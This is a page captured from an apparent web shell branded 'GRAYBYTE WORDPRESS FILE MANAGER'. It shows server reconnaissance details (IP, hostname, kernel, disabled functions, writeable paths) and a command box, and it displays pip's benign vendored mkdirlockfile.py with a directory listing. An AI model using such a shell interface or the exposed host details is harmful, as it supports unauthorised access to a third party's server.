GRAYBYTE WORDPRESS FILE MANAGER5185

Server IP : 198.54.121.189 / Your IP : 216.73.216.140
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /lib/python2.7/site-packages/pip/_vendor/lockfile/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /lib/python2.7/site-packages/pip/_vendor/lockfile//mkdirlockfile.py
from __future__ import absolute_import, division

import time
import os
import sys
import errno

from . import (LockBase, LockFailed, NotLocked, NotMyLock, LockTimeout,
               AlreadyLocked)


class MkdirLockFile(LockBase):
    """Lock file by creating a directory."""
    def __init__(self, path, threaded=True, timeout=None):
        """
        >>> lock = MkdirLockFile('somefile')
        >>> lock = MkdirLockFile('somefile', threaded=False)
        """
        LockBase.__init__(self, path, threaded, timeout)
        # Lock file itself is a directory.  Place the unique file name into
        # it.
        self.unique_name = os.path.join(self.lock_file,
                                        "%s.%s%s" % (self.hostname,
                                                     self.tname,
                                                     self.pid))

    def acquire(self, timeout=None):
        timeout = timeout if timeout is not None else self.timeout
        end_time = time.time()
        if timeout is not None and timeout > 0:
            end_time += timeout

        if timeout is None:
            wait = 0.1
        else:
            wait = max(0, timeout / 10)

        while True:
            try:
                os.mkdir(self.lock_file)
            except OSError:
                err = sys.exc_info()[1]
                if err.errno == errno.EEXIST:
                    # Already locked.
                    if os.path.exists(self.unique_name):
                        # Already locked by me.
                        return
                    if timeout is not None and time.time() > end_time:
                        if timeout > 0:
                            raise LockTimeout("Timeout waiting to acquire"
                                              " lock for %s" %
                                              self.path)
                        else:
                            # Someone else has the lock.
                            raise AlreadyLocked("%s is already locked" %
                                                self.path)
                    time.sleep(wait)
                else:
                    # Couldn't create the lock for some other reason
                    raise LockFailed("failed to create %s" % self.lock_file)
            else:
                open(self.unique_name, "wb").close()
                return

    def release(self):
        if not self.is_locked():
            raise NotLocked("%s is not locked" % self.path)
        elif not os.path.exists(self.unique_name):
            raise NotMyLock("%s is locked, but not by me" % self.path)
        os.unlink(self.unique_name)
        os.rmdir(self.lock_file)

    def is_locked(self):
        return os.path.exists(self.lock_file)

    def i_am_locking(self):
        return (self.is_locked() and
                os.path.exists(self.unique_name))

    def break_lock(self):
        if os.path.exists(self.lock_file):
            for name in os.listdir(self.lock_file):
                os.unlink(os.path.join(self.lock_file, name))
            os.rmdir(self.lock_file)

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
March 03 2024 20:23:47
root / root
0755
__init__.py
9.151 KB
April 21 2022 18:08:21
root / root
0644
__init__.pyc
11.828 KB
April 21 2022 18:08:34
root / root
0644
__init__.pyo
11.828 KB
April 21 2022 18:08:34
root / root
0644
linklockfile.py
2.59 KB
April 21 2022 18:08:21
root / root
0644
linklockfile.pyc
2.841 KB
April 21 2022 18:08:34
root / root
0644
linklockfile.pyo
2.841 KB
April 21 2022 18:08:34
root / root
0644
mkdirlockfile.py
3.023 KB
April 21 2022 18:08:21
root / root
0644
mkdirlockfile.pyc
3.346 KB
April 21 2022 18:08:34
root / root
0644
mkdirlockfile.pyo
3.346 KB
April 21 2022 18:08:34
root / root
0644
pidlockfile.py
5.947 KB
April 21 2022 18:08:21
root / root
0644
pidlockfile.pyc
5.771 KB
April 21 2022 18:08:34
root / root
0644
pidlockfile.pyo
5.771 KB
April 21 2022 18:08:34
root / root
0644
sqlitelockfile.py
5.377 KB
April 21 2022 18:08:21
root / root
0644
sqlitelockfile.pyc
4.593 KB
April 21 2022 18:08:34
root / root
0644
sqlitelockfile.pyo
4.593 KB
April 21 2022 18:08:34
root / root
0644
symlinklockfile.py
2.555 KB
April 21 2022 18:08:21
root / root
0644
symlinklockfile.pyc
2.759 KB
April 21 2022 18:08:34
root / root
0644
symlinklockfile.pyo
2.759 KB
April 21 2022 18:08:34
root / root
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF